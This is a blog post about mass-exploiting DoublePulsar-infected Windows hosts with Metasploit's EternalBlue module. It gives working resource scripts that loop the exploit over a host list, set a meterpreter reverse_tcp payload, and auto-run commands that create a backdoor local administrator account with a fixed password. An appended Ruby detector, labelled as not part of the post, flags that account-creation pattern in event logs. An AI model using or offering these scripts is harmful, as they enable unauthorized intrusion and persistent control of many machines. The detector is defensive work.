Thursday, August 16, 2018

remotely exploit a number of hosts with metasploit via eternalblue

in a previous post i have mentioned how to scan for doublepulsar-infected hosts and how to feed these hosts to msf. that's fine, but i guess mass-exploiting those hosts is of some utility, too.

## msfconsole

```
msf > vulns -R
… a lot of text … look at the end of the output for a file dropped in /tmp, e.g. …
RHOSTS => file:/tmp/msf-db-rhosts-20180816-27096-ncow7k

msf > exit

# cd ~/.msf4/
# cp /tmp/msf-db-rhosts-20180816-27096-ncow7k thewicked
# msfconsole -r doublepulsar-loop.rc
```

Once all has completed, look through ~/.msf4/logs/doublepulsar.log for adminuser, as those are the hosts where the local admin user for your evil has been created.

## files

[doublepulsar-loop.rc]

```
<ruby>

# the rhosts from vuln_db
hostsfile = "/root/.msf4/thewicked"
hosts = []
File.open(hostsfile, "r") do |f|
  f.each_line do |line|
    hosts.push line.strip
  end
end

# msfconsole commands with chained post exploit
self.run_single("resource /root/.msf4/doublepulsar.rc")

# the rhosts loop
hosts.each do |rhost|
  self.run_single("set rhost #{rhost}")
  self.run_single("exploit")
  self.run_single("sleep 2s")
end

</ruby>
```

[doublepulsar.rc]

```
spool /root/.msf4/logs/doublepulsar.log
set consolelogging true
set loglevel 5
set sessionlogging true
set timestampoutput true

use exploit/windows/smb/ms17_010_eternalblue
set VerifyArch False
set VerifyTarget False
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST
set AUTORUNSCRIPT multiscript -rc /root/.msf4/doublepulsar-lsadmin
```

[doublepulsar-lsadmin]

```
execute -H -f cmd.exe -a "/c net user adminuser badpassword /add"
execute -H -f cmd.exe -a "/c net localgroup administrators /add adminuser"
execute -H -f cmd.exe -a "/c bitsadmin task to download a scheduled task to patch and reboot"
exit
```
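Added here as a defender's counterpart, not part of the original post: a small Ruby detector for the footprint the doublepulsar-lsadmin script leaves on a host, a local account created (Security event 4720) and then added to Administrators (event 4732) within seconds. The log lines and their key=value layout are constructed for this example and are not a real export format.

```ruby
require 'time'

# Constructed sample, not real log data: Windows Security events flattened to one
# key=value line each (4720 = user account created, 4732 = member added to a
# security-enabled local group). The field layout is an assumption of this example.
SAMPLE_EVENTS = [
  "ts=2018-08-16T10:00:01Z host=WS01 id=4720 account=adminuser",
  "ts=2018-08-16T10:00:02Z host=WS01 id=4732 account=adminuser group=Administrators",
  "ts=2018-08-16T10:05:00Z host=WS02 id=4720 account=svc_backup",
  "ts=2018-08-16T11:30:00Z host=WS02 id=4732 account=svc_backup group=Backup Operators",
  "ts=2018-08-16T12:00:00Z host=WS03 id=4732 account=adminuser group=Administrators",
].freeze

# Split a "k=v k=v" line into a hash; a value runs up to the next " key=" so a
# group name containing a space ("Backup Operators") survives intact.
def parse_event(line)
  fields = {}
  line.scan(/(\w+)=(.*?)(?=\s+\w+=|\z)/) { |k, v| fields[k] = v }
  fields
end

# Flag an account that is created and then added to Administrators on the same
# host within `window` seconds: exactly the sequence the lsadmin script runs.
# Returns one finding per matching 4720/4732 pair.
def detect_admin_creation(lines, window: 60)
  created = {}   # [host, account] => creation Time
  findings = []
  lines.map { |l| parse_event(l) }.sort_by { |e| e["ts"] }.each do |e|
    key = [e["host"], e["account"]]
    case e["id"]
    when "4720"
      created[key] = Time.iso8601(e["ts"])
    when "4732"
      next unless e["group"] == "Administrators" && created.key?(key)
      delta = Time.iso8601(e["ts"]) - created[key]
      findings << { host: e["host"], account: e["account"], seconds: delta.to_i } if delta <= window
    end
  end
  findings
end

if __FILE__ == $0
  detect_admin_creation(SAMPLE_EVENTS).each do |f|
    puts "ALERT #{f[:host]}: #{f[:account]} created and made local admin within #{f[:seconds]}s"
  end
end
```

Only WS01 is flagged: WS02's account joins a non-admin group, and WS03 has a group change with no matching account creation on that host.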